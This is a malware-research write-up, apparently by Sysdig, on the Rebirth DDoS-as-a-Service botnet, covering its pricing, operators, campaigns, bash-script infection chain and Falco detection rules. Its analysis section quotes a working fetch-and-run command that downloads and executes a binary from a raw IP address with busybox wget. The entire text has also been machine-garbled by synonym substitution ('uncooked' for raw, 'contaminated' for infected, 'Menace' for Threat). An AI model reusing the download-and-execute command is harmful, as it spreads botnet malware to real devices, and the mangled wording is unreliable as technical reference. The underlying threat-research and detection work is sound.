DDoS-as-a-Service: The Rebirth Botnet

In March 2024, the Sysdig Menace Analysis Staff (TRT) started observing assaults towards one among our Hadoop honeypot companies from the area “rebirthltd[.]com.” Upon investigation, we found that the area pertains to a mature and more and more fashionable DDoS-as-a-Service botnet. The service is predicated on the Mirai malware household, and the operators promote its companies by means of Telegram and a web-based retailer (rebirthltd.mysellix[.]io). The menace actors working the botnet are financially motivated and promote their service primarily to the video gaming neighborhood, though there isn’t any proof that this botnet is just not being bought past gaming-related functions, and organizations should be liable to falling sufferer to those botnets assaults. On this article, we’ll take an in depth have a look at how this group operates from a enterprise and technical viewpoint. 

RebirthLtd

On the core of the RebirthLtd’s enterprise is its DDoS botnet, which is rented out to whomever is prepared to pay. The botnet’s present capabilities embrace:

 • tcpbypass : Spoofed + uncooked TCP bypass assault.
 • ovhtcp : Spoofed TCP complicated flood.
 • tcptfo : Spoofed TCP TFO floods.
 • handshake : Spoofed + uncooked handshake connections flood.
 • tcpreflect : Spoofed TCP packets mirrored assault auto bypass geoblock.
 • tcprst : uncooked TCP RST packets terminate connections.
 • udpbypass : udp bypass uncooked flood.
 • socket : socket layer uncooked + spoof flood.
 • gamep : excessive spoofed + uncooked packets flood.
 • udpflood : uncooked UDP packets flood.
 • ackflood : uncooked TCP ACK packets flood.
 • synflood : uncooked TCP SYN packets flood.
 • wraflood : tcp uncooked handshake flood.Code language: Perl (perl)

RebirthLtd presents its companies by means of a wide range of packages listed on a web-based storefront that has been registered since August 2022. The most affordable plan, for which a purchaser can buy a subscription and instantly obtain entry to the botnet’s companies, is priced at $15. The essential plan appears to solely embrace entry to the botnet’s executables and restricted functionalities when it comes to accessible variety of contaminated shoppers. Dearer plans embrace API entry, C2 servers availability, and improved options, such because the variety of assaults per second that may be launched.

The botnet’s major companies appear to be concentrating on online game streamers for monetary acquire, as its Telegram channel claims that RebirthHub (one other moniker for the botnet, together with RebirthLtd) is able to “hitting almost all types of game servers.”

rebirth botnet

The Telegram channel was created in April 2023, however the first message promoting the Rebirth botnet was posted on the finish of January 2024. Common updates are posted each few days. On the time of writing, there have been roughly 200 subscribers.

RebirthId 11

The botnet appears to be monitored by a DDoS monitoring web site, tumult.community, the place it seems within the prime 5 rankings because the fifth-most prolific botnet for whole requests despatched, presumably, to flood targets.

RebirthId 15

Tumult is an rising useful resource, which acts just like the Yellow Pages or Craigslist for DDoS companies. Over the previous few years, the positioning has grown as a result of ease of organising malicious operations, for instance, as a result of Mirai’s supply code itself is freely accessible. A number of botnet buildkit instruments have been noticed, as analyzed by Imperva. There’s a profitable marketplace for clients who’re prepared to pay a small payment to sublease contaminated gadgets and perform malicious operations, protected by the anonymity that the botmasters are capable of present with companies reminiscent of Rebirth. For the botmasters, who had been beforehand related to hacking teams, this has facilitated the illicit monetization of their technical abilities. 

Motivations

Within the Telegram channel, this botnet claims to be able to “hitting almost all types of game servers,” and we discovered that many of the Rebirth botnet customers are concentrating on online game streamers for monetary acquire.

DDoS within the gaming trade appears to be an more and more widespread difficulty. With a botnet reminiscent of Rebirth, a person is ready to DDoS the sport server or different gamers in a dwell recreation, both inflicting video games to glitch and decelerate or different gamers’ connections to lag or crash. The person then seems to be extra expert than the remaining. This can be financially motivated for customers of streaming companies reminiscent of Twitch, whose enterprise mannequin depends on a streaming participant gaining followers; this primarily offers a type of revenue by means of the monetization of a damaged recreation.

Our speculation for the rise in gaming DDoS is corroborated by the findings we’ve gathered on the people liable for the event and upkeep of the botnet.

One other use case for patrons of the Rebirth botnet is “DDoS trolling.” Also referred to as “stresser trolling,” this phenomenon can also be fairly prevalent within the gaming neighborhood, because it entails the usage of botnets to launch DDoS assaults towards gaming servers. The assaults in query intention to disrupt the gaming expertise of reliable gamers, flooding the server with an amazing quantity of visitors and rendering it inaccessible or inflicting extreme lags.

Attribution

Menace Group Members

RebirthId 6
RebirthId 29
RebirthId 25

The chief of Rebirth appears to be a person referred to as “CazzG” on Telegram, however this username was not current within the channel bio on the time of writing. Upon additional evaluation, we recognized the username CazzG listed individually as each the help admin and CEO for one more botnet referred to as “estresse.pro.” Moreover, there’s a risk this person is Chinese language. We discovered Chinese language commercials within the channel which mentioned to contact CazzG for buy. In a Telegram channel for the Tsuki botnet, which can also be marketed within the Rebirth channel, we additionally discovered that CazzG’s username shows a Chinese language flag. Lastly, we recognized different monikers for this particular person throughout our analysis together with “Elliot,” “rootkit ty,” and “R00TK.”

RebirthId 16
RebirthId 27

The Telegram channel for the stresse.professional botnet doesn’t appear energetic anymore, and the final message posted issues the precise sale of the botnet.

RebirthId 13
RebirthId 14
RebirthId 10

We imagine a German-speaking particular person by the username of “Docx69” on Telegram, and “prixnuke” on TikTok and YouTube, can also be a Rebirth botnet administrator and advocate. They incessantly add movies on TikTok of their streaming classes for video video games “Call of Duty: Warzone,” usually with a disclaimer {that a} “Nuke Service” is out there for buy in a personal, invitation solely Discord server “shop4youv2.” We made a direct correlation with the Rebirth botnet due to a YouTube video that was circulated within the Telegram channel claiming that the botnet could cause lags to one of many gaming servers internet hosting Warzone. The video itself is an commercial for the Rebirth botnet.

rebirth botnet
Hyperlink to YT “prixnuke” video
rebirth botnet
Docx69 on TikTok below the moniker “prixnuke”

The area shop4youv2.de was a part of an FBI takedown operation named “Operation PowerOFF,” as proven beneath, which began in 2022 based on this article.

rebirth botnet

An ELF Digest report we discovered identifies the area as spreading Mirai malware, whose C2 was IPv4 93[.]123[.]85[.]149. Based on AlienVault, this IP hosted sooner or later the area “tsuki.army,” which is the area used to promote a secondary botnet throughout the Rebirth Telegram channel.

RebirthId 7

Be taught How To Stop DDoS Assaults

Malware Household

As is the case with many botnet and malware variants, Rebirth is the end result of a number of well-known malware households. Whereas investigating associated earlier campaigns, we discovered this tweet from Could 2020 that included an in depth evaluation of a malware that was named by the creator as “Rebirth” and “Vulcan.” 

RebirthId 19

From a November 2020 evaluation on VirusTotal, the Rebirth/Vulcan malware household for this DDoS botnet was not labeled as Mirai, however as its circle of relatives referred to as Rebirth. It was described as a botnet constructed off Gafgyt however particularly made to focus on IoT gadgets. Based on the creator, the malware additionally inherited some capabilities from recognized households QBot and STDBot, additionally incorporating recognized exploits. 

We’re very assured that these previous findings are early evolutions of the Rebirth DDoS botnet assaults we see now. Campaigns previous to August 2022 had been seemingly the Rebirth leaders or affiliated members, whereas assaults following the commercial of Rebirth as a DDoS-as-a-service botnet seemingly embrace patrons.

Campaigns

Early Campaigns

Digging additional into the preliminary Rebirth botnet findings courting again to 2019, we discovered a number of technical particulars confirming the present RebirthLtd botnet-for-hire is identical. The tweet beneath exhibits variants circulating below executable names “rebirth”. The information from 2019 are nonetheless accessible in VT.

RebirthId 12

The payload from the tweet resembles the bash scripts we’ve collected from latest botnet assaults.

RebirthId 8
Payload from Twitter
RebirthId 24
Payload collected

Current Campaigns

The Rebirth botnet has been fairly energetic since its preliminary commercial on Telegram this yr. It’s much less seemingly that these latest assaults are the Rebirth founders and builders, however moderately different customers who’ve bought the botnet functionality. Attribution can get fairly convoluted in for-sale and for-hire situations.

Rebirth botnet assaults are being actively recognized and reported by others as nicely, as seen right here. Nonetheless, the C2 recognized as rebirthbot[.]icu is now lifeless. In an earlier assault, on Feb. 11, 2024, Fox_threatintel tweeted a number of particulars, together with the identical bash scripts we recognized. As proven beneath, this marketing campaign was related to “Stresse.Pro,” which we recognized above as associated to the founding father of Rebirth. One other attention-grabbing a part of this assault evaluation is the correlation with an APT group referred to as “rEAL l33t hxors,” for which we’ve not discovered additional proof.

rebirth botnet

We additionally obtained assaults to our honeypots from three different domains related to the Rebirth botnet:

  • Yoshiproxy[.]ltd
  • Yosh[.]ltd
  • yoshservices[.]ltd

We discovered proof that the area “yosh.ltd” had beforehand executed Rebirth assaults in September 2023. Throughout triage, we discovered the related area “blkyosh.com.” Telemetry in VirusTotal reveals that these assaults have already been detected in quite a lot of nations: Spain, United States, Eire, and Germany.

An infection Strategies

The malicious ELFs are unfold on a goal system by downloading and executing a bash script, whose code stays the identical in all campaigns. The filename and executable names are modified based on both the marketing campaign or a given vulnerability exploited. For instance, one of many scripts we collected is called after the Ruckus Wi-fi Admin software program which was, sooner or later, weak to CVE-2023-25717. We imagine that the naming conference corresponds to the malware compatibility for a given goal system, the place sure bots are deployed based on both a weak service or just for structure compatibility. For instance, on this case beneath, as soon as the attackers discover a weak Ruckus software program, they deploy the precise appropriate botnet variant.

RebirthId 26

The script follows the identical construction:

  • It makes an attempt to vary the listing (cd) to a number of places reminiscent of /tmp, /var/run, /mnt, and /root. That is seemingly an try to navigate to widespread directories the place non permanent information or system information is perhaps saved.
  • It then makes an attempt to obtain a number of information from a distant server utilizing wget. These information have names like rebirth.mips, rebirth.mpsl, rebirth.sh4, and so on.
  • After downloading every file, it units execute permissions (chmod +x) and executes them (./filename). These information are then eliminated (rm -rf) after execution.

A second variant of the bash script pipes the malicious retrieval and execution of the ELF information into busybox, utilizing the next command:

cd /usr; rm -rf mpsl ; /bin/busybox wget http://194.169.175.43/mpsl; chmod 777 mpsl ; ./mpsl lillin; cd /usr; rmCode language: Perl (perl)

This can be a latest introduction that goals to reduce detection dangers by benefiting from the numerous busybox built-in instructions. This discovering additionally corroborates the earlier proof of Rebirth we discovered, the place the payloads are completely different based on whether or not the goal runs the busybox suite. On the time of writing, we’ve collected 11 bash scripts, accessible right here.

Be taught How To Stop DDoS Assaults

We had been capable of retrieve 137 Rebirth executables, that are bundled by the attackers based on the marketing campaign and run by inputting a prefix (e.g., authentic ELFarm4” is labeled “l1arm4,” “k1arm4”). 

A few of them don’t have any detections on VirusTotal and weren’t submitted previous to our investigations. On the time of writing, we’ve discovered 90 undetected variants, for which a listing of IoCs is out there right here.

Dynamic Evaluation

Upon execution of a random pattern of undetected variants we collected, we had been capable of set up that these variants appear akin to beforehand documented Gafgyt samples given the strategies used, reminiscent of counting on the prctl syscall to masks its course of title to /bin/bash

These samples particularly all conclude their execution by echoing “RebirthLTD.”

It’s attention-grabbing to notice that the executables are set with particular instructions to start out, for instance, “$1” or “ntel.” In any other case, they don’t appear to carry out the identical operations.

rebirth botnet

The optionally available argument may function a mechanism for distant management or command injection, as attackers might use this function to remotely difficulty instructions to contaminated gadgets, instructing them to carry out particular actions or obtain and execute further payloads. This may additionally make the malware conduct much less predictable and tougher to research, as attackers have integrated randomness or variability into the execution course of. Therefore, had we not totally obtained the preliminary payload (bash script) containing the proper arguments for the given ELFs, we might haven’t been capable of seize the malware’s conduct.

Investigating with our Sysdig captures, we noticed the next:

The malware performs numerous learn operations on the /proc/web/tcp file, one byte at a time. The tcp file offers details about energetic community connections on the host. Rebirth could also be trying to scan for additional weak gadgets by studying /proc/web/tcp or comparable information, with the target of figuring out open ports and potential targets for an infection.

RebirthId 28

It then performs socket creation and binding to the native deal with addresses on a particular port “8345,” which means that this system is organising a community listener. Within the case of Rebirth, this might be the malware organising a command and management server to obtain instructions from the attacker or to coordinate with different contaminated gadgets within the botnet.

RebirthId 9

This variant additionally units socket choices to govern the conduct of community connections, reminiscent of enabling the reuse of addresses to facilitate fast propagation and evasion of detection.

RebirthId

It then concludes its execution by making a fork, on this case to additional perform malicious operations reminiscent of scanning for weak gadgets and launching distributed denial-of-service (DDoS) assaults.

RebirthId 18

Detection

The prctl system name is often used to manage numerous elements of a course of’s conduct. One particular choice, PR_SET_NAME, can be utilized to assign a reputation to a course of, which could be helpful for debugging functions. Nonetheless, this function could be abused by malicious actors to obfuscate the true nature of a course of or to impersonate reliable processes, as we’ve noticed with the Rebirth malware. In our case, the prctl syscall was used to set the method title as /bin/bash to evade detection by safety instruments. 

rebirth botnet

This method name is leveraged by numerous instruments, so we’re offering an instance restricted to applications executed from a suspicious location, reminiscent of /tmp. Falco can be utilized to detect the usage of Rebirth within the runtime utilizing a customized rule and a default one that may detect the beginning execution of Rebirth at runtime, however you may as well modify or craft new ones if you wish to enhance the detection.

- rule: Suspicious Course of Impersonation
  desc: Adversaries might try to govern the title of a process or service to make it seem reliable or benign.
  situation: evt.kind=prctl and evt.dir=< and evt.arg.choice="PR_SET_NAME" and (proc.exepath incorporates "/tmp" or proc.exepath incorporates "/shm")
  exceptions:
  outputs: Course of invoked title change from suspicious location (proc.exepath=%proc.exepath evt.args=%evt.args proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline person.title=%person.title person.loginuid=%person.loginuid proc.tty=%proc.tty proc.cmdline=%proc.cmdline proc.pcmdline=%proc.pcmdline gcmdline=%proc.acmdline[2] container.id=%container.id container_name=%container.title proc.pid=%proc.pid proc.cwd=%proc.cwd picture=%container.picture.repository:%container.picture.tag evt.args=%evt.args)
  precedence: WARNING
  tags: [host, container, process]Code language: Perl (perl)

Rebirth and different Linux malware is commonly run from the “/tmp” listing. This listing is backed by reminiscence and never saved on the laborious drive, making it tougher to search out with forensics. Any executions from non permanent directories ought to be reviewed. 

- rule: Execution from /tmp
  desc: This rule detects file execution from the /tmp listing, a standard tactic for menace actors to stash their readable+writable+executable information.
  situation: spawned_process and (proc.exepath startswith "/tmp/" or (proc.title in (shell_binaries) and proc.args startswith "/tmp/")) and not pip_venv_tmp 
  exceptions:
  output: File execution detected from /tmp by course of %proc.title with guardian %proc.pname on %container.title below person %person.title with cmdline %proc.cmdline (proc.cmdline=%proc.cmdline connection=%fd.title person.title=%person.title proc.title=%proc.title proc.pname=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4] person.loginuid=%person.loginuid container.id=%container.id evt.kind=%evt.kind evt.res=%evt.res proc.pid=%proc.pid proc.cwd=%proc.cwd proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline proc.sid=%proc.sid proc.exepath=%proc.exepath person.uid=%person.uid person.loginname=%person.loginname group.gid=%group.gid group.title=%group.title container.title=%container.title picture=%container.picture.repository)
  precedence: WARNINGCode language: Perl (perl)

Conclusion

The discharge of the Mirai supply code in 2017 and the appearance of cryptocurrency has created a whole new trade round providing botnets for Denial of Service companies. Rebirth exhibits the continued evolution of this enterprise mannequin as they develop into extra refined on the commercial-side whereas additionally taking benefit of the present growth in CVEs. 

Irrespective of the motivation of the customers, these companies will proceed to current a menace to all networks and reinforce the necessity for good safety hygiene. Organizations don’t need to discover themselves as a part of these botnets as it’ll lead to degraded efficiency, elevated prices, and probably reputational harm. Proactive vulnerability administration and real-time runtime menace detection are two efficient methods of coping with threats like a Rebirth botnet DDoS. 

Recent articles

Google: 70% of exploited flaws disclosed in 2023 have been zero-days

Mandiant safety analysts warn of a worrying new pattern...

10 Greatest Challenge Portfolio Administration (PPM) Software program for 2024

Challenge portfolio administration (PPM) assists managers in figuring out...

SolarWinds Net Assist Desk flaw is now exploited in assaults

CISA has added three flaws to its 'Recognized Exploited...

North Korean Hackers Deploy Linux FASTCash Malware for ATM Cashouts

North Korean hackers goal Linux-based cost switches with new...